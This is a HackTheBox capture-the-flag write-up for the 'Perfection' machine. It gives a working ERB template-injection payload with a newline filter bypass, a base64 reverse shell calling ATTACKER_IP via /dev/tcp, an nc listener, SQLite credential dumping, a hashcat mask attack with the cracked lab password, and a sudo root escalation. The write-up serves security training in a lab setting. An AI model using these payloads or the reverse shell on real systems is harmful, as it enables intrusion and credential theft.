HTB: Perfection Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐⭐☆
• SSTI/Exploitation: ⭐⭐⭐⭐☆
• Password Cracking: ⭐⭐⭐☆☆

Summary

Perfection is an Easy-difficulty Linux machine running a weighted calculator application built with WEBrick (Ruby web server). The machine showcases Server-Side Template Injection (SSTI) vulnerabilities, input filtering bypass techniques, and password cracking using masked attacks. The exploitation path involves discovering SSTI in the calculator’s category parameter, bypassing filters with newline encoding, injecting ERB templates for remote code execution, extracting credentials from a SQLite database, cracking password hashes with hashcat using custom mask attacks, and finally achieving privilege escalation through misconfigured sudo permissions.

TL;DR: Web Enumeration → SSTI via Filter Bypass → RCE as susan → Database Credential Extraction → Hashcat Mask Attack → SSH Access → Privilege Escalation via sudo.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- perfection.htb

Results:

22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    WEBrick 1.7.0 (Ruby 3.0.0 (2020-12-25))

Service Enumeration

Hostname: perfection.htb

echo "10.10.10.130 perfection.htb" >> /etc/hosts
curl -v http://perfection.htb/

Service Details:

• Port 22: OpenSSH for remote access
• Port 80: WEBrick 1.7.0 (Ruby web server) hosting a weighted calculator application

Web Application Analysis

Manual testing of the weighted calculator revealed a form accepting:

• Category parameter (vulnerable to SSTI)
• Grade/score inputs
• Weight inputs

The application processes these inputs through ERB templates, enabling template injection attacks.

Directory and Subdomain Enumeration

gobuster dir -u http://perfection.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
feroxbuster -u http://perfection.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Finding: Standard directories and subdomains returned no additional useful endpoints. The vulnerability resides in the calculator form input handling.

Initial Foothold

Server-Side Template Injection (SSTI) Discovery

The weighted calculator’s category parameter was identified as vulnerable to SSTI. The application filters certain characters but can be bypassed using newline encoding (%0A).

Exploitation: Filter Bypass with Newline Injection

Attack Vector: The application implements a basic filter for dangerous characters. By injecting a newline (%0A), we can break out of the filter’s scope and inject arbitrary Ruby/ERB code.

Payload Construction:

First, create a base64-encoded reverse shell payload:

# Create reverse shell command (adjust ATTACKER_IP and PORT)
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# Encode in base64
echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" | base64

SSTI Injection:

category1=a///A77ss/e%0A;<%25%3d+system("echo+BASE64_PAYLOAD+|+base64+-d+|+bash")+%25>

This payload:

1. Bypasses the filter with the newline character (%0A)
2. Injects ERB template code (<%= system(...) %>)
3. Decodes and executes the base64-encoded reverse shell
4. Returns code execution as the susan user

Manual Exploitation:

# Set up listener on attacker machine
nc -lvnp 4444

# Send crafted request to vulnerable parameter
curl "http://perfection.htb/weighted_calculator" \
  -d "category1=a///A77ss/e%0A;<%25%3d+system(\"echo+YmFzaCAtaSA+JiAvZGV2L3RjcC9BVFRBQ0tFUl9JUC80NDQ0IDA+JjE=+|+base64+-d+|+bash\")+%25>&grade1=50&weight1=10"

Shell Stabilization

Once initial shell access is obtained:

# Stabilize shell with Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

Or using traditional method:

# Ctrl+Z to suspend
stty raw -echo
fg
export TERM=xterm

Result: Remote code execution as user susan on the target system.

User Compromise

Credential Extraction from SQLite Database

After gaining shell access as susan, enumeration revealed a SQLite database containing user credentials:

# Locate the database
find / -name "*.db" -type f 2>/dev/null
ls -la /home/susan/Migration/

# Connect to SQLite database
sqlite3 /home/susan/Migration/pupilpath_credentials.db

# List tables
.tables

# Extract credentials
SELECT * FROM users;

Database Content: The pupilpath_credentials.db contains SHA-256 password hashes for multiple users. Extracted hash for user susan.

Initial Hash Cracking Attempt

# Standard rockyou wordlist attack (failed)
hashcat -m 1400 susan_hash.txt /usr/share/wordlists/rockyou.txt

Result: No match found with rockyou wordlist.

Password Format Discovery

Further enumeration revealed /var/mail/susan containing a hint about password structure:

cat /var/mail/susan

Hint: Password format follows the pattern: {firstname}_{firstname_reversed}_{random_number_1_to_1000000000}

For user susan, the format is: susan_nasus_{8-9 digit random number}

Hashcat Mask Attack

Using the discovered password format, a targeted mask attack was employed:

# Create hash file with susan's SHA-256 hash
echo "SUSAN_SHA256_HASH" > susan_hash.txt

# Perform mask attack with custom format
hashcat -m 1400 susan_hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

# Where ?d = digit (0-9)

Result: Password cracked successfully.

Cracked Password: susan_nasus_413759210

SSH Access

ssh susan@perfection.htb
# Enter password: susan_nasus_413759210

Access Confirmed: SSH session established as user susan.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

# Check sudo permissions
sudo -l

# Output:
# Matching Defaults entries for susan on perfection:
#     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
#
# User susan may run the following commands on perfection:
#     (ALL : ALL) ALL

Finding: User susan has unrestricted sudo privileges — can run any command as root without password authentication.

Exploitation: Direct Root Access

# Execute privileged command
sudo su -

# Or directly invoke root shell
sudo /bin/bash

Result: Immediate root shell access with UID 0.

Verification

id
# uid=0(root) gid=0(root) groups=0(root)

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Target: perfection.htb:80"] --> B["Identify WEBrick/Ruby Web Server"]
    B --> C["Discover SSTI in Calculator Form"]
    C --> D["Bypass Input Filter with Newline Injection"]
    D --> E["Execute ERB Template Injection"]
    E --> F["Reverse Shell as susan User"]
    F --> G["Extract SQLite Database Credentials"]
    G --> H["Identify Password Format from Mail"]
    H --> I["Crack Hash with Hashcat Mask Attack"]
    I --> J["SSH Access as susan"]
    J --> K["Check Sudo Permissions"]
    K --> L["Execute: sudo su -"]
    L --> M["Root Shell Access"]
    M --> N["Capture Root Flag"]

Tools Used

Vulnerability Reference

Key Learnings

1. SSTI Exploitation Requires Filter Analysis

   • Server-Side Template Injection vulnerabilities can be bypassed with encoding tricks (e.g., newline injection)
   • Understanding the filtering logic is essential to craft payloads that bypass restrictions
   • ERB template syntax in Ruby applications presents critical RCE risks

2. Credential Extraction from Application Data

   • Web applications often interact with local databases (SQLite, MySQL, etc.)
   • Compromised application servers provide access to credentials for horizontal movement
   • Database enumeration should be prioritized during post-exploitation

3. Password Cracking with Contextual Information

   • Hints about password structure (found in system files, emails, documentation) dramatically improve cracking efficiency
   • Hashcat mask attacks (-a 3) are more effective than wordlist attacks when password patterns are known
   • Information leakage in log files and mail can reveal password generation schemes

4. Sudo Misconfiguration as Privilege Escalation

   • sudo -l should always be checked immediately after gaining user shell
   • Unrestricted sudo permissions (ALL : ALL) ALL provide instant root access
   • Sudo misconfigurations are often overlooked but are the quickest path to privilege escalation

5. Shell Stabilization for Interactive Access

   • Initial reverse shells may lack interactive features (terminal control, signal handling)
   • Using python3 -c 'import pty; pty.spawn("/bin/bash")' provides proper TTY allocation
   • Setting TERM=xterm and using stty raw -echo enables full shell functionality

6. Enumeration Beyond Standard Vulnerability Scanning

   • Automated tools (nmap, gobuster) found nothing unusual
   • Manual testing of web forms revealed the critical SSTI vulnerability
   • HTB machines often require thoughtful, targeted testing rather than script-dependent enumeration

Author

Security Researcher - HackTheBox Community

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. The techniques and exploits documented here should only be used in authorized penetration testing engagements and training environments with explicit permission.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #SSTI #TemplateInjection #ERB #RubyOnRails #Hashcat #CredentialExtraction #PrivEsc